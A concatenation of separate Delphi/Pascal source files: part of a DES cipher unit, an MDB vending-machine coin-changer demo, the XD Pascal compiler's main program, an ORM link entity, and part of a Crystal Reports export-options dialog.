Ciphertext: uint64; var Plaintext: uint64; const Key: TExpandedKey); var L, R, T32: uint32; i: integer; begin IP_Transform( Ciphertext, R, L); // L & R swapped. for i := 15 downto 0 do begin T32 := R; R := L; L := DES_Permute( i, R, Key) xor T32 end; IP_InverseTransform( L, R, Plaintext) end; { TDES } function TDES.BlockSize: integer; begin result := 64 end; constructor TDES.Create; begin end; function TDES.DefinitionURL: string; begin result := 'http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdf' end; function TDES.DisplayName: string; begin result := 'DES' end; function TDES.Features: TAlgorithmicFeatureSet; begin result := [ afCryptographicallyWeak, afOpenSourceSoftware] end; function TDES.GenerateKey( Seed: TStream): TSymetricKey; var SeedKey: uint64; begin Seed.ReadBuffer( SeedKey, 8); result := TDESKey.Create( SeedKey) end; function TDES.KeySize: integer; begin result := 56 end; function TDES.LoadKeyFromStream( Store: TStream): TSymetricKey; begin result := TDESKey.CreateFromStream( Store) end; function TDES.MakeBlockCodec( Key: TSymetricKey): IBlockCodec; begin result := TDESCodec.Create( Key as TDESKey) end; function TDES.ProgId: string; begin result := DES_ProgId end; function TDES.SeedByteSize: integer; begin result := 8 end; function TDES.SelfTest_Plaintext: TBytes; { This from "FIPS PUB 81 - DES MODES OF OPERATION" (http://www.itl.nist.gov/fipspubs/fip81.htm) TABLE B1: AN EXAMPLE OF THE ELECTRONIC CODEBOOK (ECB) MODE The ECB mode in the encrypt state has been selected. Cryptographic Key = 0123456789abcdef The plain text is the ASCII code for "Now is the time for all ." These seven-bit characters are written in hexadecimal notation (0,b7,b6,...,b1). TIME PLAINTEXT | DES INPUT BLOCK | DES OUTPUT BLOCK | CIPHERTEXT 1. 4e6f772069732074 | 4e6f772069732074 | 3fa40e8a984d4315 | 3fa40e8a984d4815 2. 68652074696d652o | 68652074696d652o | 6a271787ab8883f9 | 6a271787ab8883f9 3. 666f7220616c6c20 | 666f7220616c6c20 | 893d51ec4b563b53 | 893d51ec4b563b53 The ECB mode in the decrypt state has been selected. TIME PLAINTEXT | DES INPUT BLOCK | DES OUTPUT BLOCK | CIPHERTEXT 1. 3fa40e8a984d4815 | 3fa40e8a984d4815 | 4e6f772o69732o74 | 4e6f772069732074 2. 6a271787ab8883f9 | 6a271787ab8883f9 | 68652074696d6520 | 68652074696d6520 3. 893d51ec4b563b53 | 893d51ec4b563b53 | 666f7220616c6c20 | 666f7220616c6c20} begin result := AnsiBytesOf('4e6f772069732074'); end; function TDES.SelfTest_Ciphertext: TBytes; begin result := AnsiBytesOf('3fa40e8a984d4815'); end; function TDES.SelfTest_Key: TBytes; begin result := AnsiBytesOf('0123456789abcdef'); end; function TDES.WikipediaReference: string; begin result := 'Data_Encryption_Standard' end; procedure SetParityBitsOnKey( var K: uint64); var ByteIndex, BitIdx: integer; Byte1: byte; Parity: byte; begin for ByteIndex := 0 to 7 do begin Byte1 := Int64Rec( K).Bytes[ ByteIndex]; Parity := $00; for BitIdx := 7 downto 1 do Parity := Parity xor ((Byte1 shr BitIdx) and $01); Int64Rec( K).Bytes[ ByteIndex] := (Byte1 and $FE) or Parity end end; function hasCorrectParity( K: uint64): boolean; var ByteIndex, BitIdx: integer; Byte1: byte; Parity: byte; begin for ByteIndex := 0 to 7 do begin Byte1 := Int64Rec( K).Bytes[ ByteIndex]; Parity := $00; for BitIdx := 7 downto 1 do Parity := Parity xor ((Byte1 shr BitIdx) and $01); result := (Byte1 and $01) = Parity end end; { TDESKey } constructor TDESKey.Create( NativeKey1: uint64); begin FNativeKey := NativeKey1; SetParityBitsOnKey( FNativeKey); ExpandKey( FNativeKey, FExpandedKey) end; constructor TDESKey.CreateFromStream( Store: TStream); begin Store.ReadBuffer( FNativeKey, 8); if not hasCorrectParity( FNativeKey) then raise Exception.Create( ES_InvalidKey); ExpandKey( FNativeKey, FExpandedKey) end; procedure TDESKey.SaveToStream(Stream: TStream); begin Stream.Write( FNativeKey, 8) end; procedure TDESKey.Burn; begin FNativeKey := 0; FillChar( FExpandedKey, SizeOf( FExpandedKey), 0) end; { TDESCodec } constructor TDESCodec.Create( LockBoxKey1: TDESKey); begin FLockBoxKey := LockBoxKey1 end; procedure TDESCodec.Encrypt_Block( Plaintext, Ciphertext: TMemoryStream); var PlaintextBlock, CiphertextBlock: uint64; begin Move( Plaintext.Memory^, PlaintextBlock, 8); DES_EncryptBlock( PlaintextBlock, CiphertextBlock, FLockBoxKey.FExpandedKey); Move( CiphertextBlock, Ciphertext.Memory^, 8) end; procedure TDESCodec.Decrypt_Block( Plaintext, Ciphertext: TMemoryStream); var PlaintextBlock, CiphertextBlock: uint64; begin Move( Ciphertext.Memory^, CiphertextBlock, 8); DES_DecryptBlock( CiphertextBlock, PlaintextBlock, FLockBoxKey.FExpandedKey); Move( PlaintextBlock, Plaintext.Memory^, 8) end; procedure TDESCodec.Reset; begin end; procedure TDESCodec.Burn; begin end; end.
{******************************************************************************* DEMOSTRADOR de bus MDB con DELPHI Requiere la libreria TComPort 4.11 Codigo bajo licencia MIT Desarrollado por Axel GUILLAUMET www.ingenieriaelectronica.net https://github.com/AxelGUILLAUMET/MDB_Protocol_Delphi *******************************************************************************} unit MainForm; interface uses Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants, System.Classes, Vcl.Graphics, Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.ExtCtrls, Vcl.StdCtrls, CPort, inifiles, Vcl.Buttons, Vcl.Imaging.pngimage; type TFMainForm = class(TForm) MDB_COM_TIMER: TTimer; MDB_COMPORT: TComPort; MDB_PARSER_TIMER: TTimer; GroupBox2: TGroupBox; Shape_STAT_MDB_COMPORT: TShape; Label1: TLabel; Label_MDB_COMPORT: TLabel; Label7: TLabel; Label_MDB_STATUS: TLabel; GroupBox3: TGroupBox; Label6: TLabel; Label11: TLabel; Label12: TLabel; Label15: TLabel; Label16: TLabel; GroupBox1: TGroupBox; Label5: TLabel; Label2: TLabel; Label3: TLabel; Label4: TLabel; Edit1: TEdit; BitBtn2: TBitBtn; Label8: TLabel; Label9: TLabel; Label10: TLabel; Label13: TLabel; Label14: TLabel; Label_MDB_tubeA: TLabel; Label_MDB_tubeB: TLabel; Label_MDB_tubeD: TLabel; Label_MDB_tubeE: TLabel; Label_MDB_tubeC: TLabel; BitBtn5: TBitBtn; BitBtn4: TBitBtn; Label18: TLabel; Label_MDB_totalTubes: TLabel; GroupBox5: TGroupBox; GroupBox4: TGroupBox; Memo1: TMemo; BitBtn1: TBitBtn; BitBtn3: TBitBtn; procedure MDB_PARSE; procedure MDB_COM_TIMERTimer(Sender: TObject); procedure FormCreate(Sender: TObject); procedure FormDestroy(Sender: TObject); procedure MDB_COMPORTRxChar(Sender: TObject; Count: Integer); procedure MDB_PARSER_TIMERTimer(Sender: TObject); procedure BitBtn2Click(Sender: TObject); procedure BitBtn4Click(Sender: TObject); procedure BitBtn1Click(Sender: TObject); procedure BitBtn3Click(Sender: TObject); procedure BitBtn5Click(Sender: TObject); private MDB_COM_BUFFER : String; // Buffer serial del puerto serial al cual se conecta el dispositivo MDB public MDB_COM : string; // Nombre del puerto serial al cual se conecta el dispositivo MDB m50c : word; // Cantidad de monedas de 50 centavos presentes en cassette m1p : word; // Cantidad de monedas de 1 peso presentes en cassette m2p : word; // Cantidad de monedas de 2 pesos presentes en cassette m5p : word; // Cantidad de monedas de 5 pesos presentes en cassette m10p : word; // Cantidad de monedas de 10 pesos presentes en cassette cantidad_insertada : word; // Cantidad de dinero total insertado MDB_Status : byte; // Estatuto MDB del sistema // 1 -> Escrow request // 2 -> hanger payout busy // 3 -> No credit // 4 -> Defective tube sensor // 5 -> Double arrival // 6 -> Acceptor unplugged // 7 -> Tube jam // 8 -> ROM checksum error // 9 -> Coin routing error // 10 -> Changer busy // 11 -> Changer was reset // 12 -> Coin jam // Vendran mas para billetera // 255 -> No Message... Monedero_MDB_ispolled : boolean; MDB_polldelay : word; Timer_MSG_MDB_STATUS : word; end; var FMainForm: TFMainForm; inifile : Tinifile; // Objeto Inifile de la configuracion global implementation {$R *.dfm} uses HWSetting, AboutForm; procedure TFMainForm.BitBtn1Click(Sender: TObject); begin FAboutForm.showmodal; end; procedure TFMainForm.BitBtn2Click(Sender: TObject); begin MDB_COMPORT.WriteStr(chr($0F)); MDB_COMPORT.WriteStr(chr($02)); MDB_COMPORT.WriteStr(chr(strtoint(edit1.text)*2)); //MDB_COMPORT.WriteStr(#$0F#$02#$04); end; procedure TFMainForm.BitBtn3Click(Sender: TObject); begin application.terminate; end; procedure TFMainForm.BitBtn4Click(Sender: TObject); begin FHWSetting.showmodal; end; procedure TFMainForm.BitBtn5Click(Sender: TObject); begin MDB_COMPORT.WriteStr(chr($0A)); end; procedure TFMainForm.FormCreate(Sender: TObject); begin // Codigo de inicializacion inifile := TInifile.create(GetCurrentDir +'/config.ini'); MDB_COM_BUFFER := ''; MDB_Status := 255; // No hay mensaje MDB Monedero_MDB_ispolled := false; // El monedero MDB no ha sido polleado try MDB_COM := inifile.ReadString('system','MDB_COMPORT','COM1'); Label_MDB_COMPORT.Caption := MDB_COM; MDB_COMPORT.Port := MDB_COM; except end; end; procedure TFMainForm.FormDestroy(Sender: TObject); begin inifile.Free; end; procedure TFMainForm.MDB_COMPORTRxChar(Sender: TObject; Count: Integer); var RX_MDB_data : string; begin MDB_PARSER_TIMER.Enabled := false; // El parseo de los datos MDB esta trabajando con un timer diferente hay que pararlo mientras que llemos el puerto serial. MDB_COMPORT.ReadStr(RX_MDB_data, Count); MDB_COM_BUFFER := MDB_COM_BUFFER + RX_MDB_data; memo1.Text := memo1.Text + RX_MDB_data; MDB_PARSER_TIMER.Enabled := true; // Reactivamos el timer del timer del parseo MDB end; procedure TFMainForm.MDB_COM_TIMERTimer(Sender: TObject); begin // Loop para verificar si el TComPort MDB_COMPORT esta abierto, en caso contrario intenamos abrirlo. // El COMPORT NO esta abierto if not MDB_COMPORT.Connected then begin try MDB_COMPORT.Open; // POLL test para estar seguro MDB_COMPORT.WriteStr(chr($0B)); except end; end // El COMPORT ESTA abierto else begin if Monedero_MDB_ispolled then Shape_STAT_MDB_COMPORT.Brush.Color := cllime else Shape_STAT_MDB_COMPORT.Brush.Color := clred; try // MDB_COMPORT.Close; except end; end; // Hacemos un POLL al monedero para ver el estatuto general del sistema { MDB_polldelay := MDB_polldelay + 1; if MDB_polldelay >= 10 then begin Monedero_MDB_ispolled := false; MDB_polldelay := 0; MDB_COMPORT.WriteStr(chr($0B)); end; } // Gestion de Label_MDB_STATUS Timer_MSG_MDB_STATUS := Timer_MSG_MDB_STATUS + 1; if (Timer_MSG_MDB_STATUS >= 5) then begin Timer_MSG_MDB_STATUS := 10; MDB_Status := 255; Label_MDB_STATUS.Caption := '-'; end; end; procedure TFMainForm.MDB_PARSER_TIMERTimer(Sender: TObject); begin MDB_PARSER_TIMER.Enabled := false; MDB_PARSE; // Con ese timer, se ejectura el parse de los datos MDB recibidos. MDB_PARSER_TIMER.Enabled := true; end; procedure TFMainForm.MDB_PARSE; var watchdog : integer; tempvalue : string; begin /////////////// // Parse MDB // /////////////// // REVISAR BIEN EL PARSE READ : DE REPENTE NO TOMA EN CUENTA LA MONEDA // EL ERROR ES QUE MANDA DE REPENTE 08 21 en LUGAR DE una trama completa y no devuelvle la moneda. // (Aparentemente se arreglo desactivando el timer al momento de recibir los datos del puerto serial...) // Verificar cotejo con mas de 127 monedas en total----- // CADENA VACIA, SALIMOS if (MDB_COM_BUFFER = '') then exit; // Si el buffer esta vacio, salimos de la procedure // ----------------- // POLL MONEDERO MDB // ----------------- // 00 #13 #10 // Longitud de la cadena 5 caracteres if ((MDB_COM_BUFFER[1] = '0') and (MDB_COM_BUFFER[2] = '0') and (MDB_COM_BUFFER[3] = ' ') and(MDB_COM_BUFFER[4] = #13) and (MDB_COM_BUFFER[5] = #10) and (MDB_COM_BUFFER.Length = 5)) then begin Monedero_MDB_ispolled := true; Delete(MDB_COM_BUFFER, 1, 5); // Liberamos del buffer la trama que parseamos. end else // ---------------- // MONEDA INSERTADA // ---------------- // 08 xx yy // Longitud de la cadena 10 caracteres // 08 -> Direccion MDB para monedero [1][2] // -> Espacio [3] // xx -> Tipo de moneda (52,53,54,55) [4][5] // -> Espacio [6] // yy -> Cantidad de monedas presentes en el cassette [7][8] // FINAL -> #13 #10 [9][10] if ((MDB_COM_BUFFER[1] = '0') and (MDB_COM_BUFFER[2] = '8') and (MDB_COM_BUFFER[4] = '5')) then begin // Loopeamos hasta tener el final de la trama para asegurarnos de que viene completa. // Vérificamos los 2 bytes del final watchdog := 0; repeat watchdog := watchdog + 1; if (watchdog >= 20000) then begin Delete(MDB_COM_BUFFER, 1, 1); exit; end; until ((MDB_COM_BUFFER[9] = #13) and (MDB_COM_BUFFER[10] = #10)); // Se suma al dinero total insertado if (MDB_COM_BUFFER[5] = '2') then begin // 52 -> 1 peso cantidad_insertada := cantidad_insertada + 1; end; if (MDB_COM_BUFFER[5] = '3') then begin // 53 -> 2 pesos cantidad_insertada := cantidad_insertada + 2; end; if (MDB_COM_BUFFER[5] = '4') then begin // 54 -> 5 pesos cantidad_insertada := cantidad_insertada + 5; end; if (MDB_COM_BUFFER[5] = '5') then begin // 55 -> 10 pesos cantidad_insertada := cantidad_insertada + 10; end; label2.Caption := inttostr(cantidad_insertada); Delete(MDB_COM_BUFFER, 1, 10); // Liberamos del buffer la trama que parseamos. end else // ----------------- // ESTATUTO MONEDERO // ----------------- // 08 xx // Longitud de la cadena 7 caracteres // 08 -> Direccion MDB para monedero [1][2] // -> Espacio [3] // xx -> Codigo de err or [4][5] // FINAL -> #13 #10 [6][7] if ((MDB_COM_BUFFER[1] = '0') and (MDB_COM_BUFFER[2] = '8') and (MDB_COM_BUFFER[4] = '0')) then begin // Loopeamos hasta tener el final de la trama para asegurarnos de que viene completa. // Vérificamos los 2 bytes del final watchdog := 0; repeat watchdog := watchdog + 1; if (watchdog >= 20000) then begin Delete(MDB_COM_BUFFER, 1, 1); exit; end; until ((MDB_COM_BUFFER[6] = #13) and (MDB_COM_BUFFER[7] = #10)); // Identificamos el ESTATUTO MDB del monedero case MDB_COM_BUFFER[5] of // Escrow request '1' : begin MDB_Status := 1; Label_MDB_STATUS.Caption := 'Escrow request'; end; // Changer payout busy '2' : begin MDB_Status := 2; Label_MDB_STATUS.Caption := 'Changer payout busy'; end; // No credit '3' : begin MDB_Status := 3; Label_MDB_STATUS.Caption := 'No credit'; end; // Defective tube sensor '4' : begin MDB_Status := 4; Label_MDB_STATUS.Caption := 'Defective tube sensor'; end; // Double arrival '5' : begin MDB_Status := 5; Label_MDB_STATUS.Caption := 'Double arrival'; end; // Acceptor unplugged '6' : begin MDB_Status := 6; Label_MDB_STATUS.Caption := 'Acceptor unplugged'; end; // Tube jam '7' : begin MDB_Status := 7; Label_MDB_STATUS.Caption := 'Tube jam'; end; // ROM checksum error '8' : begin MDB_Status := 8; Label_MDB_STATUS.Caption := 'ROM checksum error'; end; // Coin routing error '9' : begin MDB_Status := 9; Label_MDB_STATUS.Caption := 'Coin routing error'; end; // Changer busy 'A' : begin MDB_Status := 10; Label_MDB_STATUS.Caption := 'Changer busy'; end; // Changer was reset 'B' : begin MDB_Status := 11; Label_MDB_STATUS.Caption := 'Changer was reset'; end; // Coin jam 'C' : begin MDB_Status := 12; Label_MDB_STATUS.Caption := 'Coin jam'; end; end; Timer_MSG_MDB_STATUS := 0; Delete(MDB_COM_BUFFER, 1, 7); // Liberamos del buffer la trama que parseamos. end else // -------------- // ESTATUTO TUBOS // -------------- // 00 00 vv 00 ww xx yy zz 00 00 00 00 00 00 00 00 00 00 tt // Longitud de la cadena 58 caracteres // vv -> 50 Centavos [7][8] - Tubo A // ww -> 1 Peso [13][14] - Tubo B // xx -> 2 Pesos [16][17] - Tubo D // yy -> 5 Pesos [19][20] - Tubo E // zz -> 10 Pesos [22][23] - Tubo C // FINAL -> #13 #10 [57][58] if ((MDB_COM_BUFFER[1] = '0') and (MDB_COM_BUFFER[2] = '0') and (MDB_COM_BUFFER[3] = ' ') and (MDB_COM_BUFFER[4] = '0') and (MDB_COM_BUFFER[5] = '0')) then begin // Loopeamos hasta tener el final de la trama para asegurarnos de que viene completa. // Verificamos los 2 bytes del final watchdog := 0; repeat watchdog := watchdog + 1; if (watchdog >= 20000) then begin Delete(MDB_COM_BUFFER, 1, 1); exit; end; until ((MDB_COM_BUFFER[58] = #13) and (MDB_COM_BUFFER[59] = #10)); // Recuperamos la cantidad de monedas presentes en cada tubo m50c := ((StrToInt('$' + MDB_COM_BUFFER[7]))*16) + (StrToInt('$' + MDB_COM_BUFFER[8])); m1p := ((StrToInt('$' + MDB_COM_BUFFER[13]))*16) + (StrToInt('$' + MDB_COM_BUFFER[14])); m2p := ((StrToInt('$' + MDB_COM_BUFFER[16]))*16) + (StrToInt('$' + MDB_COM_BUFFER[17])); m5p := ((StrToInt('$' + MDB_COM_BUFFER[19]))*16) + (StrToInt('$' + MDB_COM_BUFFER[20])); m10p := ((StrToInt('$' + MDB_COM_BUFFER[22]))*16) + (StrToInt('$' + MDB_COM_BUFFER[23])); Label_MDB_tubeA.Caption := inttostr(m50c); Label_MDB_tubeB.Caption := inttostr(m1p); Label_MDB_tubeD.Caption := inttostr(m2p); Label_MDB_tubeE.Caption := inttostr(m5p); Label_MDB_tubeC.Caption := inttostr(m10p); Label_MDB_totalTubes.Caption := inttostr( (m50c div 2) + (m1p)+(m2p*2)+(m5p*5)+(m10p*10) )+'$MXN'; Delete(MDB_COM_BUFFER, 1, 58); // Liberamos del buffer la trama que parseamos. end else begin // Detectamos otro tipo de entrada, la ignoramos Delete(MDB_COM_BUFFER, 1, 1); // Liberamos del buffer la trama que parseamos. end; end; end.
// XD Pascal - a 32-bit compiler for Windows // Copyright (c) 2009-2010, 2019-2020, Vasiliy Tereshkov {$APPTYPE CONSOLE} {$I-} {$H-} program XDPW; uses SysUtils, Common, Scanner, Parser, CodeGen, Linker; procedure SplitPath(const Path: TString; var Folder, Name, Ext: TString); var DotPos, SlashPos, i: Integer; begin Folder := ''; Name := Path; Ext := ''; DotPos := 0; SlashPos := 0; for i := Length(Path) downto 1 do if (Path[i] = '.') and (DotPos = 0) then DotPos := i else if (Path[i] = '\') and (SlashPos = 0) then SlashPos := i; if DotPos > 0 then begin Name := Copy(Path, 1, DotPos - 1); Ext := Copy(Path, DotPos, Length(Path) - DotPos + 1); end; if SlashPos > 0 then begin Folder := Copy(Path, 1, SlashPos); Name := Copy(Path, SlashPos + 1, Length(Name) - SlashPos); end; end; procedure NoticeProc(ClassInstance: Pointer; const Msg: TString); begin WriteLn(Msg); end; procedure WarningProc(ClassInstance: Pointer; const Msg: TString); begin if NumUnits >= 1 then Notice(ScannerFileName + ' (' + IntToStr(ScannerLine) + ') Warning: ' + Msg) else Notice('Warning: ' + Msg); end; procedure ErrorProc(ClassInstance: Pointer; const Msg: TString); begin if NumUnits >= 1 then Notice(ScannerFileName + ' (' + IntToStr(ScannerLine) + ') Error: ' + Msg) else Notice('Error: ' + Msg); repeat FinalizeScanner until not RestoreScanner; FinalizeCommon; Halt(1); end; var CompilerPath, CompilerFolder, CompilerName, CompilerExt, PasPath, PasFolder, PasName, PasExt, ExePath: TString; begin SetWriteProcs(nil, @NoticeProc, @WarningProc, @ErrorProc); Notice('XD Pascal for Windows ' + VERSION); Notice('Copyright (c) 2009-2010, 2019-2020, Vasiliy Tereshkov'); if ParamCount < 1 then begin Notice('Usage: xdpw <file.pas>'); Halt(1); end; CompilerPath := TString(ParamStr(0)); SplitPath(CompilerPath, CompilerFolder, CompilerName, CompilerExt); PasPath := TString(ParamStr(1)); SplitPath(PasPath, PasFolder, PasName, PasExt); InitializeCommon; InitializeLinker; InitializeCodeGen; Folders[1] := PasFolder; Folders[2] := CompilerFolder + 'units\'; NumFolders := 2; CompileProgramOrUnit('system.pas'); CompileProgramOrUnit(PasName + PasExt); ExePath := PasFolder + PasName + '.exe'; LinkAndWriteProgram(ExePath); Notice('Complete. Code size: ' + IntToStr(GetCodeSize) + ' bytes. Data size: ' + IntToStr(InitializedGlobalDataSize + UninitializedGlobalDataSize) + ' bytes'); repeat FinalizeScanner until not RestoreScanner; FinalizeCommon; end.
unit eLink; interface uses API_ORM, eCommon; type TLink = class(TEntity) private FBodyGroupID: Integer; FHandledTypeID: Integer; FHash: string; FJobID: Integer; FLevel: Integer; FOwnerGroupID: Integer; FURL: string; procedure SetURL(aValue: string); public class function GetStructure: TSructure; override; published property BodyGroupID: Integer read FBodyGroupID write FBodyGroupID; property HandledTypeID: Integer read FHandledTypeID write FHandledTypeID; property Hash: string read FHash write FHash; property JobID: Integer read FJobID write FJobID; property Level: Integer read FLevel write FLevel; property OwnerGroupID: Integer read FOwnerGroupID write FOwnerGroupID; property URL: string read FURL write SetURL; end; TLinkList = TEntityAbstractList<TLink>; implementation uses eGroup, System.Hash; procedure TLink.SetURL(aValue: string); begin FURL := aValue; FHash := THashMD5.GetHashString(aValue); end; class function TLink.GetStructure: TSructure; begin Result.TableName := 'CORE_LINKS'; AddForeignKey(Result.ForeignKeyArr, 'OWNER_GROUP_ID', TGroup, 'ID'); end; end.
unit UDExportOptions; interface uses SysUtils, Classes, Controls, Forms, StdCtrls, Buttons, ComCtrls, ExtCtrls, Graphics, Dialogs, UCrpe32; type TCrpeExportOptionsDlg = class(TForm) pnlExport: TPanel; pnlDestination: TPanel; cbKeepOpen: TCheckBox; btnExport: TBitBtn; SaveDialog1: TSaveDialog; pnlDestinations: TPanel; pcDestination: TPageControl; tsToFile: TTabSheet; tsToEmailViaMapi: TTabSheet; tsToEmailViaVim: TTabSheet; tsToMsExchange: TTabSheet; tsToLotusNotes: TTabSheet; tsToApplication: TTabSheet; pnlFile: TPanel; lblFileName: TLabel; editFileName: TEdit; btnEdit: TButton; pnlApplication: TPanel; lblAFileName: TLabel; lblAppName: TLabel; editAFileName: TEdit; btnAFileName: TButton; editAppName: TEdit; btnApplication: TButton; pnlExchange: TPanel; lblProfile: TLabel; lblExchangePassword: TLabel; lblFolder: TLabel; editProfile: TEdit; editFolder: TEdit; editExchangePassword: TEdit; pnlMapi: TPanel; lblSubject: TLabel; lblMessage: TLabel; lblCCList: TLabel; lblToList: TLabel; editToList: TEdit; editCCList: TEdit; editSubject: TEdit; memoMessage: TMemo; pnlEmailVim: TPanel; lblVimSubject: TLabel; lblVimMessage: TLabel; lblVimTo: TLabel; lblVimCC: TLabel; lblVimBcc: TLabel; editVimTo: TEdit; editVimCC: TEdit; editVimSubject: TEdit; memoVimMessage: TMemo; editVimBcc: TEdit; pnlLotusNotes: TPanel; lblDBName: TLabel; lblComments: TLabel; lblFormName: TLabel; editDBName: TEdit; editFormName: TEdit; editComments: TEdit; btnClear: TButton; btnCancel: TButton; btnOk: TButton; rgDestination: TRadioGroup; rgFileType: TRadioGroup; btnOptions: TButton; cbPromptForOptions: TCheckBox; cbPromptOnOverwrite: TCheckBox; cbProgressDialog: TCheckBox; editUserName: TEdit; lblUserName: TLabel; editPassword: TEdit; lblPassword: TLabel; procedure FormShow(Sender: TObject); procedure FormClose(Sender: TObject; var Action: TCloseAction); procedure btnExportClick(Sender: TObject); procedure editFileNameDblClick(Sender: TObject); procedure cbPromptForOptionsClick(Sender: TObject); procedure rgDestinationClick(Sender: TObject); procedure cbKeepOpenClick(Sender: TObject); procedure cbProgressDialogClick(Sender: TObject); procedure editFileNameChange(Sender: TObject); procedure editProfileChange(Sender: TObject); procedure editFolderChange(Sender: TObject); procedure editExchangePasswordChange(Sender: TObject); procedure editToListChange(Sender: TObject); procedure editCCListChange(Sender: TObject); procedure editSubjectChange(Sender: TObject); procedure memoMessageChange(Sender: TObject); procedure editToListVChange(Sender: TObject); procedure editCCListVChange(Sender: TObject); procedure editBCCListVChange(Sender: TObject); procedure editSubjectVChange(Sender: TObject); procedure memoMessageVChange(Sender: TObject); procedure cbPromptOnOverwriteClick(Sender: TObject); procedure editAFileNameChange(Sender: TObject); procedure editAFileNameDblClick(Sender: TObject); procedure editAppNameChange(Sender: TObject); procedure editAppNameDblClick(Sender: TObject); procedure pcDestinationChange(Sender: TObject); procedure btnCancelClick(Sender: TObject); procedure btnOkClick(Sender: TObject); procedure FormCreate(Sender: TObject); procedure rgFileTypeClick(Sender: TObject); procedure btnOptionsClick(Sender: TObject); procedure editUserNameChange(Sender: TObject); procedure editPasswordChange(Sender: TObject); private { Private declarations } ExportPath : string; {Export variables} rAppName : string; rFileName : string; rFileType : integer; rDestination : integer; rPromptForOptions : boolean; rPromptOnOverwrite : boolean; {Email} rToList, rCCList, rMessage, rSubject, rPassword, rUserName, rBCCList : string; {Excel} rArea : string; rChopPageHeader : boolean; rColumnWidth : integer; rConstant : double; rConvertDatesToStrings : boolean; rCreatePageBreaks : boolean; rExportHeaderFooter : boolean; rExcelFirstPage : word; rExcelLastPage : word; rExcelUsePageRange : boolean; rWorksheetFunctions : boolean; rXLSType : integer; {Exchange} rFolder, rExchPassword, rProfile : string; {HTML} rHTMLFirstPage : word; rHTMLLastPage : word; rPageNavigator : boolean; rSeparatePages : boolean; rHTMLUsePageRange : boolean; {LotusNotes} rDBName : string; rFormName : string; rComments : string; {ODBC} rODBCPrompt : boolean; rODBCPassword, rODBCSource, rODBCTable, rODBCUser : string; {PDF} rPDFUsePageRange : Boolean; rPDFFirstPage : Word; rPDFLastPage : Word; rPDFPrompt : boolean; {RTF} rRTFUsePageRange : Boolean; rRTFFirstPage : Word; rRTFLastPage : Word; rRTFPrompt : boolean; {Text Options} rUseRptNumberFmt : boolean; rUseRptDateFmt : boolean; rStringDelimiter : char; rFieldSeparator : string; rLinesPerPage : word; rCharPerInch : word; rRecordsType : integer; {MSWord} rWordFirstPage : word; rWordLastPage : word; rWordPrompt : boolean; rWordUsePageRange : boolean; {XML} rXMLPrompt : boolean; rXMLSeparatePages : Boolean; public { Public declarations } Cr : TCrpe; end; var CrpeExportOptionsDlg: TCrpeExportOptionsDlg; bExportOptions : boolean; implementation {$R *.DFM} uses UDExportSepVal, UDExportOdbc, UDExportPagText, UDExportExcel, UDExportHTML4, UDExportRTF, UDExportPDF, UDExportXML, UDExportRecords, UDExportWord, UCrpeUtl; {------------------------------------------------------------------------------} { FormCreate procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.FormCreate(Sender: TObject); begin bExportOptions := True; LoadFormPos(Self); btnOk.Tag := 1; btnCancel.Tag := 1; btnClear.Tag := 1; end; {------------------------------------------------------------------------------} { FormShow procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.FormShow(Sender: TObject); begin {Store original settings} rAppName := Cr.ExportOptions.AppName; rFileName := Cr.ExportOptions.FileName; rFileType := Ord(Cr.ExportOptions.FileType); rDestination := Ord(Cr.ExportOptions.Destination); rPromptForOptions := Cr.ExportOptions.PromptForOptions; rPromptOnOverwrite := Cr.ExportOptions.PromptOnOverwrite; {Email} rCCList := Cr.ExportOptions.Email.CCList; rMessage := Cr.ExportOptions.Email.Message; rSubject := Cr.ExportOptions.Email.Subject; rToList := Cr.ExportOptions.Email.ToList; rBCCList := Cr.ExportOptions.Email.BCCList; rPassword := Cr.ExportOptions.Email.Password; rUserName := Cr.ExportOptions.Email.UserName; {Exchange} rFolder := Cr.ExportOptions.Exchange.Folder; rExchPassword := Cr.ExportOptions.Exchange.Password; rProfile := Cr.ExportOptions.Exchange.Profile; {LotusNotes} rDBName := Cr.ExportOptions.LotusNotes.DBName; rFormName := Cr.ExportOptions.LotusNotes.FormName; rComments := Cr.ExportOptions.LotusNotes.Comments; {Excel} rArea := Cr.ExportOptions.Excel.Area; rColumnWidth := Ord(Cr.ExportOptions.Excel.ColumnWidth); rConstant := Cr.ExportOptions.Excel.Constant; rWorksheetFunctions := Cr.ExportOptions.Excel.WorksheetFunctions; rXLSType := Ord(Cr.ExportOptions.Excel.XLSType); rChopPageHeader := Cr.ExportOptions.Excel.ChopPageHeader; rConvertDatesToStrings := Cr.ExportOptions.Excel.ConvertDatesToStrings; rCreatePageBreaks := Cr.ExportOptions.Excel.CreatePageBreaks; rExportHeaderFooter := Cr.ExportOptions.Excel.ExportHeaderFooter; rExcelFirstPage := Cr.ExportOptions.Excel.FirstPage; rExcelLastPage := Cr.ExportOptions.Excel.LastPage; rExcelUsePageRange := Cr.ExportOptions.Excel.UsePageRange; {HTML} rHTMLFirstPage := Cr.ExportOptions.HTML.FirstPage; rHTMLLastPage := Cr.ExportOptions.HTML.LastPage; rPageNavigator := Cr.ExportOptions.HTML.PageNavigator; rSeparatePages := Cr.ExportOptions.HTML.SeparatePages; rHTMLUsePageRange := Cr.ExportOptions.HTML.UsePageRange; {ODBC} rODBCPassword := Cr.ExportOptions.ODBC.Password; rODBCSource := Cr.ExportOptions.ODBC.Source; rODBCTable := Cr.ExportOptions.ODBC.Table; rODBCUser := Cr.ExportOptions.ODBC.User; rODBCPrompt := Cr.ExportOptions.ODBC.Prompt; {PDF} rPDFUsePageRange := Cr.ExportOptions.PDF.UsePageRange; rPDFFirstPage := Cr.ExportOptions.PDF.FirstPage; rPDFLastPage := Cr.ExportOptions.PDF.LastPage; rPDFPrompt := Cr.ExportOptions.PDF.Prompt; {RTF} rRTFUsePageRange := Cr.ExportOptions.RTF.UsePageRange; rRTFFirstPage := Cr.ExportOptions.RTF.FirstPage; rRTFLastPage := Cr.ExportOptions.RTF.LastPage; rRTFPrompt := Cr.ExportOptions.RTF.Prompt; {Text Options} rUseRptNumberFmt := Cr.ExportOptions.Text.UseRptNumberFmt; rUseRptDateFmt := Cr.ExportOptions.Text.UseRptDateFmt; rStringDelimiter := Cr.ExportOptions.Text.StringDelimiter; rFieldSeparator := Cr.ExportOptions.Text.FieldSeparator; 